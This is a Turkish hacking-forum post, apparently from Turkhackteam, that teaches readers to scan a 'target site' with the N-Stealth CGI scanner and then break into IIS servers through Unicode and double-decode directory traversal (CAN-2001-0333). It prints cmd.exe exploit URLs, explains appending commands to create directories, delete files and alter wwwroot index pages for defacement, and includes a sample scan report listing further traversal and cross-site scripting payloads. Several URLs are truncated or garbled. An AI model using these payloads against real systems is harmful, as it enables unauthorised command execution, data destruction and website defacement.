Dünyada En çok Kullanilan 2 Hack Yolu

SnizzeR

Katılımcı Üye
24 Ara 2006
452
2
1 sn gelicem ...
Cgi ve Uni Cod Açiklarindan en iyi Seklilde Faydalanmak için Scanner’inizin iyi Olmasi Gerek.

Yoksa Piyasada Bir çok cgi scan var, Zamaninda Hepside çok iyi di. Veritabanlarını Güncelleştirmeyen Scannerlar yeni açıklar karşında hiçte etkili olmayacaktır.

ve Açik Olmadigi Halde Basit Bir Logi Sayfasi Hakkinda açik var diye uyari Veriyorlar.

Tüm

Su An Piyasadaki En iyi Cgi Sanner N-Stealth (iP Portal Download Bölümden indirebilirsiniz)

Program Güzel Oldugu Kadar Türkçe Dil Destegininde Bulunmasi Arti Bir Özellik.

Simdi Adim Adim Bir Sisteme UniCod Açiklari Sayesinde Sizmayi Görecegiz.

Programi Kurduktan Sonra Dil Seçenekleri Çikacak Karsiniza Ordan Türkçeyi Seçin


Sunucu iP Adresi : Buraya Saldiracagimiz Hedef Sitenin ip Adresini Yaziyoruz.

(ip Adresini ögrenmek için siteye ping atin yeter c:>ping -t gibi illegalport.com ip adresi 66.111.48.66 )

ip Adresini Yazdiktan Sonra Tara Tusuna tiklamaniz yada Enter’a Basmaniz Yeterli.

Baglanti Hiziniza Bagli Olarak islem Biraz Sürecektir. (öneri olarak: önce Local Network’ünüzde Deneyebilirsiniz.

Tabiki Networkünüzdeki (Saldiracaginiz Makinada) Web Server Kurulu Olmali.

Bu Sekilde Sistemin isleyisini çok daha hizli görebilirsiniz.)

N-Stealth Bir Açik Buldugu Anda üstteki Gibi Muhtemel Yazlim Hatasi Bulundu diye bir uyari verecektir.

Hemen Sag Taraftaki Yeri Butonuna Tiklayarak Açigi Görebilirsiniz. Ama En iyisi Sonuna Kadar Beklemek.



Tarama Islemi Bittiginde Sistem Otomatik Olarak Size Html Formatinda Rapor Olusturacaktir.

Bu Raporun örnegini asagida görebilirsiniz.

Raporu html olarak Kaydedin.

Rapor Türkçedir ve Sistemdeki Açiklari, Risk Seviyelerini Size Gösterecektir.

ve html dosyasindan Direkt Çalistirabilmeniz için Hazir Linkler Olusturacaktir.



html olarak internet Explorer’dan oldugu gibi. Direk Program üzerinden de

bu açiklari Açik Butonuna Tiklayarak çalistirabilirsiniz.




Simdi En Can Alici Nokta : color=#000000http://10.0.0.8/msadc/..%c0%af..%c0%...../winnt/syste m32/cmd.exe?/c+dir+c:
(Bu Açiga Ait Bir Link)

Link in Sonunda +dir+c: bölümü var bütün is burda. dir yazan yere cdm.exe nin çalistirdigi tüm komutlari yazabilirsiniz.

Mesela Dizin Olusturmak için +md+c:dizinAdi

Dosya Silmek için +del+c:dosya adi

Diznler Arasi Geçis için Bildigimiz cd Komutunu kullanabiliriz +cd+c:Inetpubwwroot

wwroot a ulastikdan sonra index.htm - index.asp ye istediginizi yapin.

iste Örnek Bir N-Stealth Raporu

Default Kurulan Tüm IIS’lerde Bu Açiklar Var.

Raporda Risk Seviyeleri Belirtilmistir.


Rapor

Rapor XXXX (1X0.X0.0.XX
Tarih: 02.03.2003 19:04:14

Tarama kurallari: Normal

10.0.0.8
Sunumcu adi: XXXXX
Port: 80
Sunumcu: Microsoft-IIS/5.0

Sunumcu CGI aciklarina sahip olabilir. 160 item(s)

Special Request
Risk seviyesi: Alcak
Yeri: color=#000000http://10.0.0.8/%3cscript%3ealert’Can%20Cross%20Site% 20Attack’%3c/SCRIPT%3e.shtml
Cross-Site Scripting Vulnerability.


BLABLA Test
Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/blabla.idq SANS/FBI Top 20*

Possible Vulnerable ISAPI Extension



Special Request
Risk seviyesi: Orta
Yeri: color=#000000http://10.0.0.8/null.htw?CiWebHitsFi...obal.asa%20&Ci Restriction=none&CiHiliteType=Full
Common Vulnerability/Exposure.


Special Request
Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/msadc/..%5c..%5c...255c..%5cwin nt/system32/cmd.exe?/c+dir
IIS CGI Decode Vulnerability.


Special Request
Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/scripts/..%2f..%.....%2f..%2f. .%2f..%2fwinnt/system32/cmd.exe?/c+dir
IIS CGI Decode Vulnerability.


Special Request
MS IIS/PWS Escaped Characters Decoding Command Execution

CVE: CAN-2001-0333
Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/scripts/..%5c..%...stem32/cmd.exe ?/c+dir+c: BugTraq ID: 2708

Directory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and characters twice.



Special Request
Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/msadc/..%2f..%2f...252fwinnt/syst em32/cmd.exe?/c+dir+c:
IIS Unicode Vulnerability.



Special Request
MS IIS/PWS Escaped Characters Decoding Command Execution

CVE: CAN-2001-0333
Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/msadc/..%5c../..%2...55c../winnt/sy stem32/cmd.exe?/c+dir+c: BugTraq ID: 2708

IIS Unicode Vulnerability.


Special Request
Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/msadc/..%c0%af..%c0%...../winnt/syste m32/cmd.exe?/c+dir+c:
IIS Unicode Vulnerability. (ALINTIDIR)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.